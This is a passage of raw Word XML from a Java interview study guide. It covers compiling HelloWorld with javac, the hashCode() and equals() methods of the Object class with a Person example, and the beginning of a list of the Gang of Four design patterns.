    <w:p w14:paraId="330F1F4C" w14:textId="5FB17F23" w:rsidR="00DA046D" w:rsidRPr="00CE4B95" w:rsidRDefault="00DA04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8361997"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">javac </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HelloWorl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java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165407E" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD" w:rsidP="009361F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produces a HelloWorld.class file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468007B" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ep 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run the compiled bytecode with the JVM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB3B18" w14:textId="57996EE7" w:rsidR="00DA046D" w:rsidRPr="00CE4B95" w:rsidRDefault="00DA04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3866870"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HelloWorld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B93DC" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD" w:rsidP="009361F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Java compiler javac is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Development Kit (JDK)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it is used to compile Java source files into bytecode for execution on the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D268B7F" w14:textId="4D7ECAB4" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009361F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15ED0D9">
          <v:rect id="_x0000_i1160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372AB91" w14:textId="28115EC4" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="00F06DF5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc196307516"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where are the hash</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ode</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and equals</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods defined in java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="02A43017" w14:textId="6C8BEF6B" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="008044BE">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the hashCode() and equals() methods are defined in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Object class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD58E56" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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hashCode() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC26AFC" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hashCode() method is defined in the Object class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F2C20" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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is used to return an integer value that represents the memory address of the object. The hash code is primarily used in hash-based collections like HashMap, HashSet, and Hashtable to organize objects in buckets for efficient retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C94BB" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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objects are stored in a hash-based collection, the hash code is used to determine the bucket where the object will be placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100279E4" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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 signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1179978A" w14:textId="268214A0"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488683"/>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hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA6614" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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equals() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5AE29C" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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equals() method is also defined in the Object class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4503D" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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is used to compare two objects for equality. By default, the equals() method in the Object class compares object references (i.e., checks if two references point to the same object in memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C771EA3" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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However, it is commonly overridden in custom classes to compare the content or state of the objects instead of their references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF0B09" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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 signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78636EF8" w14:textId="49C4ED5E"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4156039"/>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equals</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Objec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p>
    <w:p w14:paraId="492AC79A" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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fault Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09384B72" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The default implementation of hashCode() in the Object class typically returns a unique integer for each object, which is based on the memory address of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB3087D" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The default implementation of equals() in the Object class checks for reference equality (i.e., if both references point to the same object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22598678" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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verriding hashCode() and equals():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F886203" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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practice, when you override the equals() method in a class, it is recommended to also override the hashCode() method to maintain the general contract between these two methods. The contract states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2504AE" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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wo objects are equal according to the equals() method, they must have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3136CA" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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wo objects have different hash codes, they are considered unequal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240FCA56" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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0CD20EC0" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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 is an example of how hashCode() and equals() are typically overridden in a custom class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A8C1B"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Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DD6A1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFAAD6"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F09D778"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079BD6A9"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086D07D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8FCA3"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100E005"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599EE6D9"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ag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ge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AF42A"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F45C738"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8B8FD"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0ADD8F51"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equals</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Objec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0CFBBE3"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thi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u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heck if the same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67ECC5"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obj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getClas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Clas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69F344C3"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> perso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Pers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p>
    <w:p w14:paraId="34A1EF24"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ag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ers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age </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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Objec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qual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ers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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43600D0C"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6E15E73"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF13A7F"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275DD003"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hashCod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501CD91"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Objec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has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Generate hash code based on fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413822A5"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195EE28"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE42AF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0F85B"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i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C34B186"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C8B1BD3"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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li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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB745B1"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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li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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F9818D"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42EBC76E"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qual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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E8C31"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hashCod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hashCod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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62652DB5" w14:textId="77777777"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1535FD7" w14:textId="6A6BFA2E" w:rsidR="009E517A" w:rsidRPr="00CE4B95"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742499E8" w14:textId="77777777" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="006C1C1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 the equals() method compares the name and age fields, and hashCode() generates a hash code based on these fields using Objects.hash().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4C811" w14:textId="6B45356D" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006C1C1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950C93F">
          <v:rect id="_x0000_i1161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AE145" w14:textId="60347B1C" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="009629C9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc196307517"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How many design patterns are present in java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="06F1D5D6" w14:textId="65CA4F30" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="009C4DD6">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Java supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>23 design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Gang of Four (GoF) design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, as described in the book </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Design Patterns: Elements of Reusable Object-Oriented Software"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Erich Gamma, Richard Helm, Ralph Johnson, and John Vlissides. These patterns are categorized into three types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5203A" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D8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Creational Patterns (5 patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D20E5E" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D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These patterns deal with object creation mechanisms, trying to create objects in a manner suitable to the situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DCF97" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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ingleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures a class has only one instance and provides a global point of access to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1591AA7A" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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actory Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines an interface for creating objects, but allows subclasses to alter the type of objects that will be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1045BCE6" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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bstract Factory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides an interface for creating families of related or dependent objects without specifying their concrete classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C8E55" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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uilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows the construction of complex objects by specifying their type and content step by step.</w:t>
      </w:r>
    </w:p>
